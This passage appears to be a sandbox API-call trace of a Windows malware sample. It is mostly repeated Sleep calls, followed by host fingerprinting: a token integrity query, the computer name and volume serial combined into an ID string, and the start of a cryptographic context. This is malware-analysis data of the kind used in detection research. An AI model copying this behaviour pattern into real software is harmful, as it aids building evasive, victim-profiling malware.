(dwMilliseconds=0xa) [0098.299] Sleep (dwMilliseconds=0xa) [0098.325] Sleep (dwMilliseconds=0xa) [0098.331] Sleep (dwMilliseconds=0xa) [0098.345] Sleep (dwMilliseconds=0xa) [0098.363] Sleep (dwMilliseconds=0xa) [0098.377] Sleep (dwMilliseconds=0xa) [0098.392] Sleep (dwMilliseconds=0xa) [0098.408] Sleep (dwMilliseconds=0xa) [0098.424] Sleep (dwMilliseconds=0xa) [0098.471] Sleep (dwMilliseconds=0xa) [0098.504] Sleep (dwMilliseconds=0xa) [0098.521] Sleep (dwMilliseconds=0xa) [0098.533] Sleep (dwMilliseconds=0xa) [0098.548] Sleep (dwMilliseconds=0xa) [0098.565] Sleep (dwMilliseconds=0xa) [0098.579] Sleep (dwMilliseconds=0xa) [0098.595] Sleep (dwMilliseconds=0xa) [0098.611] Sleep (dwMilliseconds=0xa) [0098.662] Sleep (dwMilliseconds=0xa) [0098.688] Sleep (dwMilliseconds=0xa) [0098.704] Sleep (dwMilliseconds=0xa) [0098.719] Sleep (dwMilliseconds=0xa) [0098.735] Sleep (dwMilliseconds=0xa) [0098.752] Sleep (dwMilliseconds=0xa) [0098.766] Sleep (dwMilliseconds=0xa) [0098.784] Sleep (dwMilliseconds=0xa) [0098.832] Sleep (dwMilliseconds=0xa) [0098.860] Sleep (dwMilliseconds=0xa) [0098.876] Sleep (dwMilliseconds=0xa) [0098.891] Sleep (dwMilliseconds=0xa) [0098.907] Sleep (dwMilliseconds=0xa) [0098.922] Sleep (dwMilliseconds=0xa) [0098.940] Sleep (dwMilliseconds=0xa) [0098.954] Sleep (dwMilliseconds=0xa) [0099.002] Sleep (dwMilliseconds=0xa) [0099.016] Sleep (dwMilliseconds=0xa) [0099.033] Sleep (dwMilliseconds=0xa) [0099.047] Sleep (dwMilliseconds=0xa) [0099.063] Sleep (dwMilliseconds=0xa) [0099.080] Sleep (dwMilliseconds=0xa) [0099.094] Sleep (dwMilliseconds=0xa) [0099.110] Sleep (dwMilliseconds=0xa) [0099.157] Sleep (dwMilliseconds=0xa) [0099.172] Sleep (dwMilliseconds=0xa) [0099.188] Sleep (dwMilliseconds=0xa) [0099.203] Sleep (dwMilliseconds=0xa) [0099.227] Sleep (dwMilliseconds=0xa) [0099.236] Sleep (dwMilliseconds=0xa) [0099.253] Sleep (dwMilliseconds=0xa) [0099.279] Sleep (dwMilliseconds=0xa) [0099.314] Sleep (dwMilliseconds=0xa) [0099.338] Sleep (dwMilliseconds=0xa) [0099.343] Sleep (dwMilliseconds=0xa) [0099.369] Sleep (dwMilliseconds=0xa) [0099.390] Sleep (dwMilliseconds=0xa) [0099.425] Sleep (dwMilliseconds=0xa) [0099.437] Sleep (dwMilliseconds=0xa) [0099.484] Sleep (dwMilliseconds=0xa) [0099.502] Sleep (dwMilliseconds=0xa) [0099.515] Sleep (dwMilliseconds=0xa) [0099.531] Sleep (dwMilliseconds=0xa) [0099.550] Sleep (dwMilliseconds=0xa) [0099.563] Sleep (dwMilliseconds=0xa) [0099.577] Sleep (dwMilliseconds=0xa) [0099.598] Sleep (dwMilliseconds=0xa) [0099.609] Sleep (dwMilliseconds=0xa) [0099.657] Sleep (dwMilliseconds=0xa) [0099.673] Sleep (dwMilliseconds=0xa) [0099.687] Sleep (dwMilliseconds=0xa) [0099.706] Sleep (dwMilliseconds=0xa) [0099.718] Sleep (dwMilliseconds=0xa) [0099.739] Sleep (dwMilliseconds=0xa) [0099.750] Sleep (dwMilliseconds=0xa) [0099.767] Sleep (dwMilliseconds=0xa) [0099.780] Sleep (dwMilliseconds=0xa) [0099.827] Sleep (dwMilliseconds=0xa) [0099.850] Sleep (dwMilliseconds=0xa) [0099.861] Sleep (dwMilliseconds=0xa) [0099.880] Sleep (dwMilliseconds=0xa) [0099.889] Sleep (dwMilliseconds=0xa) [0099.905] Sleep (dwMilliseconds=0xa) [0099.932] Sleep (dwMilliseconds=0xa) [0099.939] Sleep (dwMilliseconds=0xa) [0099.956] Sleep (dwMilliseconds=0xa) [0100.000] Sleep (dwMilliseconds=0xa) [0100.026] Sleep (dwMilliseconds=0xa) [0100.038] Sleep (dwMilliseconds=0xa) [0100.045] Sleep (dwMilliseconds=0xa) [0100.062] Sleep (dwMilliseconds=0xa) [0100.088] Sleep (dwMilliseconds=0xa) [0100.093] Sleep (dwMilliseconds=0xa) [0100.123] Sleep (dwMilliseconds=0xa) [0100.171] Sleep (dwMilliseconds=0xa) [0100.194] Sleep (dwMilliseconds=0xa) [0100.203] Sleep (dwMilliseconds=0xa) [0100.217] Sleep (dwMilliseconds=0xa) [0100.249] Sleep (dwMilliseconds=0xa) [0100.276] Sleep (dwMilliseconds=0xa) [0100.279] Sleep (dwMilliseconds=0xa) [0100.295] Sleep (dwMilliseconds=0xa) [0100.342] Sleep (dwMilliseconds=0xa) [0100.358] Sleep (dwMilliseconds=0xa) [0100.373] Sleep (dwMilliseconds=0xa) [0100.389] Sleep (dwMilliseconds=0xa) [0100.404] Sleep (dwMilliseconds=0xa) [0100.435] Sleep (dwMilliseconds=0xa) [0100.452] Sleep (dwMilliseconds=0xa) [0100.500] Sleep (dwMilliseconds=0xa) [0100.526] Sleep (dwMilliseconds=0xa) [0100.530] Sleep (dwMilliseconds=0xa) [0100.545] Sleep (dwMilliseconds=0xa) [0100.565] Sleep (dwMilliseconds=0xa) [0100.609] Sleep (dwMilliseconds=0xa) [0100.623] Sleep (dwMilliseconds=0xa) [0100.674] Sleep (dwMilliseconds=0xa) [0100.691] Sleep (dwMilliseconds=0xa) [0100.701] Sleep (dwMilliseconds=0xa) [0100.716] Sleep (dwMilliseconds=0xa) [0100.732] Sleep (dwMilliseconds=0xa) [0100.747] Sleep (dwMilliseconds=0xa) [0100.763] Sleep (dwMilliseconds=0xa) [0100.779] Sleep (dwMilliseconds=0xa) [0100.795] Sleep (dwMilliseconds=0xa) [0100.844] Sleep (dwMilliseconds=0xa) [0100.874] Sleep (dwMilliseconds=0xa) [0100.888] Sleep (dwMilliseconds=0xa) [0100.904] Sleep (dwMilliseconds=0xa) [0100.919] Sleep (dwMilliseconds=0xa) [0100.937] Sleep (dwMilliseconds=0xa) [0100.955] Sleep (dwMilliseconds=0xa) [0100.978] Sleep (dwMilliseconds=0xa) [0101.014] Sleep (dwMilliseconds=0xa) [0101.048] Sleep (dwMilliseconds=0xa) [0101.062] Sleep (dwMilliseconds=0xa) [0101.075] Sleep (dwMilliseconds=0xa) [0101.091] Sleep (dwMilliseconds=0xa) [0101.106] Sleep (dwMilliseconds=0xa) [0101.129] Sleep (dwMilliseconds=0xa) [0101.138] Sleep (dwMilliseconds=0xa) [0101.154] Sleep (dwMilliseconds=0xa) [0101.208] Sleep (dwMilliseconds=0xa) [0101.232] Sleep (dwMilliseconds=0xa) [0101.263] Sleep (dwMilliseconds=0xa) [0101.294] Sleep (dwMilliseconds=0xa) [0101.309] Sleep (dwMilliseconds=0xa) [0101.326] Sleep (dwMilliseconds=0xa) [0101.340] Sleep (dwMilliseconds=0xa) [0101.388] Sleep (dwMilliseconds=0xa) [0101.411] Sleep (dwMilliseconds=0xa) [0101.418] Sleep (dwMilliseconds=0xa) [0101.441] Sleep (dwMilliseconds=0xa) [0101.452] Sleep (dwMilliseconds=0xa) [0101.467] Sleep (dwMilliseconds=0xa) [0101.492] Sleep (dwMilliseconds=0xa) [0101.497] Sleep (dwMilliseconds=0xa) [0101.512] Sleep (dwMilliseconds=0xa) [0101.559] Sleep (dwMilliseconds=0xa) [0101.574] Sleep (dwMilliseconds=0xa) [0101.592] Sleep (dwMilliseconds=0xa) [0101.605] Sleep (dwMilliseconds=0xa) [0101.621] Sleep (dwMilliseconds=0xa) [0101.637] Sleep (dwMilliseconds=0xa) [0101.652] Sleep (dwMilliseconds=0xa) [0101.681] Sleep (dwMilliseconds=0xa) [0101.727] Sleep (dwMilliseconds=0xa) [0101.750] Sleep (dwMilliseconds=0xa) [0101.768] Sleep (dwMilliseconds=0xa) [0101.779] Sleep (dwMilliseconds=0xa) [0101.806] Sleep (dwMilliseconds=0xa) [0101.808] Sleep (dwMilliseconds=0xa) [0101.826] Sleep (dwMilliseconds=0xa) [0101.841] Sleep (dwMilliseconds=0xa) [0101.888] Sleep (dwMilliseconds=0xa) [0101.920] Sleep (dwMilliseconds=0xa) [0101.935] Sleep (dwMilliseconds=0xa) [0101.957] Sleep (dwMilliseconds=0xa) [0101.965] Sleep (dwMilliseconds=0xa) [0101.980] Sleep (dwMilliseconds=0xa) [0101.998] Sleep (dwMilliseconds=0xa) [0102.042] Sleep (dwMilliseconds=0xa) [0102.058] Sleep (dwMilliseconds=0xa) [0102.076] Sleep (dwMilliseconds=0xa) [0102.095] Sleep (dwMilliseconds=0xa) [0102.108] Sleep (dwMilliseconds=0xa) [0102.122] Sleep (dwMilliseconds=0xa) [0102.137] Sleep (dwMilliseconds=0xa) [0102.151] Sleep (dwMilliseconds=0xa) [0102.199] Sleep (dwMilliseconds=0xa) [0102.214] Sleep (dwMilliseconds=0xa) [0102.234] Sleep (dwMilliseconds=0xa) [0102.247] Sleep (dwMilliseconds=0xa) [0102.261] Sleep (dwMilliseconds=0xa) [0102.309] Sleep (dwMilliseconds=0xa) [0102.365] Sleep (dwMilliseconds=0xa) [0102.387] Sleep (dwMilliseconds=0xa) [0102.402] Sleep (dwMilliseconds=0xa) [0102.417] Sleep (dwMilliseconds=0xa) [0102.432] Sleep (dwMilliseconds=0xa) [0102.448] Sleep (dwMilliseconds=0xa) [0102.463] Sleep (dwMilliseconds=0xa) [0102.479] Sleep (dwMilliseconds=0xa) [0102.495] Sleep (dwMilliseconds=0xa) [0102.542] Sleep (dwMilliseconds=0xa) [0102.557] Sleep (dwMilliseconds=0xa) [0102.573] Sleep (dwMilliseconds=0xa) [0102.588] Sleep (dwMilliseconds=0xa) [0102.607] Sleep (dwMilliseconds=0xa) [0102.627] Sleep (dwMilliseconds=0xa) [0102.635] Sleep (dwMilliseconds=0xa) [0102.651] Sleep (dwMilliseconds=0xa) [0102.698] Sleep (dwMilliseconds=0xa) [0102.722] Sleep (dwMilliseconds=0xa) [0102.730] Sleep (dwMilliseconds=0xa) [0102.746] Sleep (dwMilliseconds=0xa) [0102.760] Sleep (dwMilliseconds=0xa) [0102.780] Sleep (dwMilliseconds=0xa) [0102.791] Sleep (dwMilliseconds=0xa) [0102.810] Sleep (dwMilliseconds=0xa) [0102.870] Sleep (dwMilliseconds=0xa) [0102.913] Sleep (dwMilliseconds=0xa) [0102.916] Sleep (dwMilliseconds=0xa) [0102.932] Sleep (dwMilliseconds=0xa) [0102.947] Sleep (dwMilliseconds=0xa) [0102.973] Sleep (dwMilliseconds=0xa) [0102.980] Sleep (dwMilliseconds=0xa) [0102.994] Sleep (dwMilliseconds=0xa) [0103.042] Sleep (dwMilliseconds=0xa) [0103.060] Sleep (dwMilliseconds=0xa) [0103.073] Sleep (dwMilliseconds=0xa) [0103.092] Sleep (dwMilliseconds=0xa) [0103.103] Sleep (dwMilliseconds=0xa) [0103.119] Sleep (dwMilliseconds=0xa) [0103.136] Sleep (dwMilliseconds=0xa) [0103.151] Sleep (dwMilliseconds=0xa) [0103.165] Sleep (dwMilliseconds=0xa) [0103.214] Sleep (dwMilliseconds=0xa) [0103.233] Sleep (dwMilliseconds=0xa) [0103.243] Sleep (dwMilliseconds=0xa) [0103.261] Sleep (dwMilliseconds=0xa) [0103.297] Sleep (dwMilliseconds=0xa) [0103.306] Sleep (dwMilliseconds=0xa) [0103.322] Sleep (dwMilliseconds=0xa) [0103.369] Sleep (dwMilliseconds=0xa) [0103.385] Sleep (dwMilliseconds=0xa) [0103.400] Sleep (dwMilliseconds=0xa) [0103.417] Sleep (dwMilliseconds=0xa) [0103.431] Sleep (dwMilliseconds=0xa) [0103.447] Sleep (dwMilliseconds=0xa) [0103.467] Sleep (dwMilliseconds=0xa) [0103.478] Sleep (dwMilliseconds=0xa) [0103.529] Sleep (dwMilliseconds=0xa) [0103.540] Sleep (dwMilliseconds=0xa) [0103.555] Sleep (dwMilliseconds=0xa) [0103.571] Sleep (dwMilliseconds=0xa) [0103.588] Sleep (dwMilliseconds=0xa) [0103.603] Sleep (dwMilliseconds=0xa) [0103.618] Sleep (dwMilliseconds=0xa) [0103.634] Sleep (dwMilliseconds=0xa) [0103.683] Sleep (dwMilliseconds=0xa) [0103.696] Sleep (dwMilliseconds=0xa) [0103.712] Sleep (dwMilliseconds=0xa) [0103.728] Sleep (dwMilliseconds=0xa) [0103.743] Sleep (dwMilliseconds=0xa) [0103.759] Sleep (dwMilliseconds=0xa) [0103.778] Sleep (dwMilliseconds=0xa) [0103.790] Sleep (dwMilliseconds=0xa) [0103.837] Sleep (dwMilliseconds=0xa) [0103.859] Sleep (dwMilliseconds=0xa) [0103.868] Sleep (dwMilliseconds=0xa) [0103.898] Sleep (dwMilliseconds=0xa) [0103.899] Sleep (dwMilliseconds=0xa) [0103.915] Sleep (dwMilliseconds=0xa) [0103.930] Sleep (dwMilliseconds=0xa) [0103.948] Sleep (dwMilliseconds=0xa) [0103.993] Sleep (dwMilliseconds=0xa) [0104.014] Sleep (dwMilliseconds=0xa) [0104.025] Sleep (dwMilliseconds=0xa) [0104.041] Sleep (dwMilliseconds=0xa) [0104.055] Sleep (dwMilliseconds=0xa) [0104.077] Sleep (dwMilliseconds=0xa) [0104.086] Sleep (dwMilliseconds=0xa) [0104.101] Sleep (dwMilliseconds=0xa) [0104.117] Sleep (dwMilliseconds=0xa) [0104.174] Sleep (dwMilliseconds=0xa) [0104.193] Sleep (dwMilliseconds=0xa) [0104.199] Sleep (dwMilliseconds=0xa) [0104.215] Sleep (dwMilliseconds=0xa) [0104.228] Sleep (dwMilliseconds=0xa) [0104.244] Sleep (dwMilliseconds=0xa) [0104.258] Sleep (dwMilliseconds=0xa) [0104.291] Sleep (dwMilliseconds=0xa) [0104.345] Sleep (dwMilliseconds=0xa) [0104.363] Sleep (dwMilliseconds=0xa) [0104.368] Sleep (dwMilliseconds=0xa) [0104.386] Sleep (dwMilliseconds=0xa) [0104.402] Sleep (dwMilliseconds=0xa) [0104.414] Sleep (dwMilliseconds=0xa) [0104.429] Sleep (dwMilliseconds=0xa) [0104.447] Sleep (dwMilliseconds=0xa) [0104.461] Sleep (dwMilliseconds=0xa) [0104.508] Sleep (dwMilliseconds=0xa) [0104.523] Sleep (dwMilliseconds=0xa) [0104.539] Sleep (dwMilliseconds=0xa) [0104.556] Sleep (dwMilliseconds=0xa) [0104.569] Sleep (dwMilliseconds=0xa) [0104.586] Sleep (dwMilliseconds=0xa) [0104.601] Sleep (dwMilliseconds=0xa) [0104.616] Sleep (dwMilliseconds=0xa) [0104.665] Sleep (dwMilliseconds=0xa) [0104.679] Sleep (dwMilliseconds=0xa) [0104.695] Sleep (dwMilliseconds=0xa) [0104.710] Sleep (dwMilliseconds=0xa) [0104.727] Sleep (dwMilliseconds=0xa) [0104.742] Sleep (dwMilliseconds=0xa) [0104.758] Sleep (dwMilliseconds=0xa) [0104.789] Sleep (dwMilliseconds=0xa) [0104.835] Sleep (dwMilliseconds=0xa) [0104.857] Sleep (dwMilliseconds=0xa) [0104.871] Sleep (dwMilliseconds=0xa) [0104.882] Sleep (dwMilliseconds=0xa) [0104.898] Sleep (dwMilliseconds=0xa) [0104.913] Sleep (dwMilliseconds=0xa) [0104.929] Sleep (dwMilliseconds=0xa) [0104.944] Sleep (dwMilliseconds=0xa) [0104.999] Sleep (dwMilliseconds=0xa) [0105.023] Sleep (dwMilliseconds=0xa) [0105.039] Sleep (dwMilliseconds=0xa) [0105.053] Sleep (dwMilliseconds=0xa) [0105.069] Sleep (dwMilliseconds=0xa) [0105.084] Sleep (dwMilliseconds=0xa) [0105.101] Sleep (dwMilliseconds=0xa) [0105.116] Sleep (dwMilliseconds=0xa) [0105.166] Sleep (dwMilliseconds=0xa) [0105.179] Sleep (dwMilliseconds=0xa) [0105.193] Sleep (dwMilliseconds=0xa) [0105.209] Sleep (dwMilliseconds=0xa) [0105.225] Sleep (dwMilliseconds=0xa) [0105.241] Sleep (dwMilliseconds=0xa) [0105.256] Sleep (dwMilliseconds=0xa) [0105.296] Sleep (dwMilliseconds=0xa) [0105.347] Sleep (dwMilliseconds=0xa) [0105.366] Sleep (dwMilliseconds=0xa) [0105.381] Sleep (dwMilliseconds=0xa) [0105.396] Sleep (dwMilliseconds=0xa) [0105.428] Sleep (dwMilliseconds=0xa) [0105.444] Sleep (dwMilliseconds=0xa) [0105.459] Sleep (dwMilliseconds=0xa) [0105.506] Sleep (dwMilliseconds=0xa) [0105.531] Sleep (dwMilliseconds=0xa) [0105.541] Sleep (dwMilliseconds=0xa) [0105.559] Sleep (dwMilliseconds=0xa) [0105.599] Sleep (dwMilliseconds=0xa) [0105.615] Sleep (dwMilliseconds=0xa) [0105.630] Sleep (dwMilliseconds=0xa) [0105.677] Sleep (dwMilliseconds=0xa) [0105.693] Sleep (dwMilliseconds=0xa) [0105.708] Sleep (dwMilliseconds=0xa) [0105.724] Sleep (dwMilliseconds=0xa) [0105.739] Sleep (dwMilliseconds=0xa) [0105.755] Sleep (dwMilliseconds=0xa) [0105.771] Sleep (dwMilliseconds=0xa) [0105.786] Sleep (dwMilliseconds=0xa) [0105.833] Sleep (dwMilliseconds=0xa) [0105.855] Sleep (dwMilliseconds=0xa) [0105.867] Sleep (dwMilliseconds=0xa) [0105.884] Sleep (dwMilliseconds=0xa) [0105.896] Sleep (dwMilliseconds=0xa) [0105.912] Sleep (dwMilliseconds=0xa) [0105.932] Sleep (dwMilliseconds=0xa) [0105.942] Sleep (dwMilliseconds=0xa) [0105.963] Sleep (dwMilliseconds=0xa) [0106.020] Sleep (dwMilliseconds=0xa) [0106.050] Sleep (dwMilliseconds=0xa) [0106.054] Sleep (dwMilliseconds=0xa) [0106.068] Sleep (dwMilliseconds=0xa) [0106.087] Sleep (dwMilliseconds=0xa) [0106.098] Sleep (dwMilliseconds=0xa) [0106.115] Sleep (dwMilliseconds=0xa) [0106.130] Sleep (dwMilliseconds=0xa) [0106.145] Sleep (dwMilliseconds=0xa) [0106.192] Sleep (dwMilliseconds=0xa) [0106.208] Sleep (dwMilliseconds=0xa) [0106.224] Sleep (dwMilliseconds=0xa) [0106.239] Sleep (dwMilliseconds=0xa) [0106.254] Sleep (dwMilliseconds=0xa) [0106.294] Sleep (dwMilliseconds=0xa) [0106.301] Sleep (dwMilliseconds=0xa) [0106.349] Sleep (dwMilliseconds=0xa) [0106.363] Sleep (dwMilliseconds=0xa) [0106.379] Sleep (dwMilliseconds=0xa) [0106.395] Sleep (dwMilliseconds=0xa) [0106.410] Sleep (dwMilliseconds=0xa) [0106.426] Sleep (dwMilliseconds=0xa) [0106.445] Sleep (dwMilliseconds=0xa) [0106.460] Sleep (dwMilliseconds=0xa) [0106.504] Sleep (dwMilliseconds=0xa) [0106.524] Sleep (dwMilliseconds=0xa) [0106.535] Sleep (dwMilliseconds=0xa) [0106.551] Sleep (dwMilliseconds=0xa) [0106.567] Sleep (dwMilliseconds=0xa) [0106.582] Sleep (dwMilliseconds=0xa) [0106.598] Sleep (dwMilliseconds=0xa) [0106.613] Sleep (dwMilliseconds=0xa) [0106.629] Sleep (dwMilliseconds=0xa) [0106.664] Sleep (dwMilliseconds=0xa) [0106.704] Sleep (dwMilliseconds=0xa) [0106.707] Sleep (dwMilliseconds=0xa) [0106.725] Sleep (dwMilliseconds=0xa) [0106.748] Sleep (dwMilliseconds=0xa) [0106.753] Sleep (dwMilliseconds=0xa) [0106.769] Sleep (dwMilliseconds=0xa) [0106.785] Sleep (dwMilliseconds=0xa) [0106.802] Sleep (dwMilliseconds=0xa) [0106.848] Sleep (dwMilliseconds=0xa) [0106.863] Sleep (dwMilliseconds=0xa) [0106.891] Sleep (dwMilliseconds=0xa) [0106.901] Sleep (dwMilliseconds=0xa) [0106.909] Sleep (dwMilliseconds=0xa) [0106.925] Sleep (dwMilliseconds=0xa) [0106.950] Sleep (dwMilliseconds=0xa) [0106.956] Sleep (dwMilliseconds=0xa) [0106.989] Sleep (dwMilliseconds=0xa) [0107.013] Sleep (dwMilliseconds=0xa) [0107.021] Sleep (dwMilliseconds=0xa) [0107.035] Sleep (dwMilliseconds=0xa) [0107.051] Sleep (dwMilliseconds=0xa) [0107.065] Sleep (dwMilliseconds=0xa) [0107.081] Sleep (dwMilliseconds=0xa) [0107.097] Sleep (dwMilliseconds=0xa) [0107.112] Sleep (dwMilliseconds=0xa) [0107.160] Sleep (dwMilliseconds=0xa) [0107.185] Sleep (dwMilliseconds=0xa) [0107.190] Sleep (dwMilliseconds=0xa) [0107.206] Sleep (dwMilliseconds=0xa) [0107.222] Sleep (dwMilliseconds=0xa) [0107.237] Sleep (dwMilliseconds=0xa) [0107.253] Sleep (dwMilliseconds=0xa) [0107.285] Sleep (dwMilliseconds=0xa) [0107.331] Sleep (dwMilliseconds=0xa) [0107.346] Sleep (dwMilliseconds=0xa) [0107.362] Sleep (dwMilliseconds=0xa) [0107.380] Sleep (dwMilliseconds=0xa) [0107.394] Sleep (dwMilliseconds=0xa) [0107.409] Sleep (dwMilliseconds=0xa) [0107.424] Sleep (dwMilliseconds=0xa) [0107.440] Sleep (dwMilliseconds=0xa) [0107.487] Sleep (dwMilliseconds=0xa) [0107.511] Sleep (dwMilliseconds=0xa) [0107.518] Sleep (dwMilliseconds=0xa) [0107.534] Sleep (dwMilliseconds=0xa) [0107.549] Sleep (dwMilliseconds=0xa) [0107.565] Sleep (dwMilliseconds=0xa) [0107.581] Sleep (dwMilliseconds=0xa) [0107.596] Sleep (dwMilliseconds=0xa) [0107.612] Sleep (dwMilliseconds=0xa) [0107.659] Sleep (dwMilliseconds=0xa) [0107.683] Sleep (dwMilliseconds=0xa) [0107.689] Sleep (dwMilliseconds=0xa) [0107.705] Sleep (dwMilliseconds=0xa) [0107.722] Sleep (dwMilliseconds=0xa) [0107.736] Sleep (dwMilliseconds=0xa) [0107.752] Sleep (dwMilliseconds=0xa) [0107.768] Sleep (dwMilliseconds=0xa) [0107.783] Sleep (dwMilliseconds=0xa) [0107.830] Sleep (dwMilliseconds=0xa) [0107.846] Sleep (dwMilliseconds=0xa) [0107.861] Sleep (dwMilliseconds=0xa) [0107.877] Sleep (dwMilliseconds=0xa) [0107.892] Sleep (dwMilliseconds=0xa) [0107.908] Sleep (dwMilliseconds=0xa) [0107.923] Sleep (dwMilliseconds=0xa) [0107.940] Sleep (dwMilliseconds=0xa) [0107.986] Sleep (dwMilliseconds=0xa) [0108.004] Sleep (dwMilliseconds=0xa) [0108.017] Sleep (dwMilliseconds=0xa) [0108.035] Sleep (dwMilliseconds=0xa) [0108.049] Sleep (dwMilliseconds=0xa) [0108.064] Sleep (dwMilliseconds=0xa) [0108.088] Sleep (dwMilliseconds=0xa) [0108.102] Sleep (dwMilliseconds=0xa) [0108.111] Sleep (dwMilliseconds=0xa) [0108.159] Sleep (dwMilliseconds=0xa) [0108.175] Sleep (dwMilliseconds=0xa) [0108.189] Sleep (dwMilliseconds=0xa) [0108.205] Sleep (dwMilliseconds=0xa) [0108.220] Sleep (dwMilliseconds=0xa) [0108.236] Sleep (dwMilliseconds=0xa) [0108.251] Sleep (dwMilliseconds=0xa) [0108.280] Sleep (dwMilliseconds=0xa) [0108.314] Sleep (dwMilliseconds=0xa) [0108.350] Sleep (dwMilliseconds=0xa) [0108.361] Sleep (dwMilliseconds=0xa) [0108.376] Sleep (dwMilliseconds=0xa) [0108.392] Sleep (dwMilliseconds=0xa) [0108.407] Sleep (dwMilliseconds=0xa) [0108.427] Sleep (dwMilliseconds=0xa) [0108.439] Sleep (dwMilliseconds=0xa) [0108.454] Sleep (dwMilliseconds=0xa) [0108.501] Sleep (dwMilliseconds=0xa) [0108.525] Sleep (dwMilliseconds=0xa) [0108.533] Sleep (dwMilliseconds=0xa) [0108.548] Sleep (dwMilliseconds=0xa) [0108.563] Sleep (dwMilliseconds=0xa) [0108.579] Sleep (dwMilliseconds=0xa) [0108.595] Sleep (dwMilliseconds=0xa) [0108.610] Sleep (dwMilliseconds=0xa) [0108.626] Sleep (dwMilliseconds=0xa) [0108.674] Sleep (dwMilliseconds=0xa) [0108.700] Sleep (dwMilliseconds=0xa) [0108.704] Sleep (dwMilliseconds=0xa) [0108.719] Sleep (dwMilliseconds=0xa) [0108.735] Sleep (dwMilliseconds=0xa) [0108.758] Sleep (dwMilliseconds=0xa) [0108.766] Sleep (dwMilliseconds=0xa) [0108.782] Sleep (dwMilliseconds=0xa) [0108.798] Sleep (dwMilliseconds=0xa) [0108.848] Sleep (dwMilliseconds=0xa) [0108.869] Sleep (dwMilliseconds=0xa) [0108.876] Sleep (dwMilliseconds=0xa) [0108.891] Sleep (dwMilliseconds=0xa) [0108.909] Sleep (dwMilliseconds=0xa) [0108.922] Sleep (dwMilliseconds=0xa) [0108.938] Sleep (dwMilliseconds=0xa) [0108.954] Sleep (dwMilliseconds=0xa) [0108.970] Sleep (dwMilliseconds=0xa) [0109.017] Sleep (dwMilliseconds=0xa) [0109.031] Sleep (dwMilliseconds=0xa) [0109.047] Sleep (dwMilliseconds=0xa) [0109.064] Sleep (dwMilliseconds=0xa) [0109.078] Sleep (dwMilliseconds=0xa) [0109.095] Sleep (dwMilliseconds=0xa) [0109.109] Sleep (dwMilliseconds=0xa) [0109.125] Sleep (dwMilliseconds=0xa) [0109.172] Sleep (dwMilliseconds=0xa) [0109.192] Sleep (dwMilliseconds=0xa) [0109.203] Sleep (dwMilliseconds=0xa) [0109.220] Sleep (dwMilliseconds=0xa) [0109.234] Sleep (dwMilliseconds=0xa) [0109.250] Sleep (dwMilliseconds=0xa) [0109.279] Sleep (dwMilliseconds=0xa) [0109.282] Sleep (dwMilliseconds=0xa) [0109.296] Sleep (dwMilliseconds=0xa) [0109.344] Sleep (dwMilliseconds=0xa) [0109.365] Sleep (dwMilliseconds=0xa) [0109.374] Sleep (dwMilliseconds=0xa) [0109.391] Sleep (dwMilliseconds=0xa) [0109.406] Sleep (dwMilliseconds=0xa) [0109.421] Sleep (dwMilliseconds=0xa) [0109.437] GetSystemDirectoryA (in: lpBuffer=0x814f6e0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.438] lstrcatW (in: lpString1="", lpString2="C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe" [0109.438] RtlGetVersion (in: lpVersionInformation=0x27a0457 | out: lpVersionInformation=0x27a0457*(dwOSVersionInfoSize=0x0, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0109.438] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x814f6c8 | out: TokenHandle=0x814f6c8*=0x6d4) returned 1 [0109.438] GetTokenInformation (in: TokenHandle=0x6d4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x814f6c0 | out: TokenInformation=0x0, ReturnLength=0x814f6c0) returned 0 [0109.439] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x25) returned 0x82f12f0 [0109.439] GetTokenInformation (in: TokenHandle=0x6d4, TokenInformationClass=0x19, TokenInformation=0x82f12f0, TokenInformationLength=0x1c, ReturnLength=0x814f6c0 | out: TokenInformation=0x82f12f0, ReturnLength=0x814f6c0) returned 1 [0109.439] GetSidSubAuthorityCount (pSid=0x82f1300*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x82f1301 [0109.439] GetSidSubAuthority (pSid=0x82f1300*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x82f1308 [0109.439] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f12f0) returned 0x25 [0109.439] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f12f0) returned 1 [0109.439] CloseHandle (hObject=0x6d4) returned 1 [0109.439] GetComputerNameA (in: lpBuffer=0x814f790, nSize=0x814f7d0 | out: lpBuffer="Q9IATRKPRH", nSize=0x814f7d0) returned 1 [0109.440] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x814f7c0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x814f7c0*=0x8443a5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0109.441] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x29) returned 0x82f12f0 [0109.441] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x14) returned 0x82f1330 [0109.441] wsprintfA (in: param_1=0x82f12f0, param_2="%s%08X%08X" | out: param_1="Q9IATRKPRH99FC78698443A5AF") returned 26 [0109.441] CryptAcquireContextA (in: phProv=0x814f718, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: 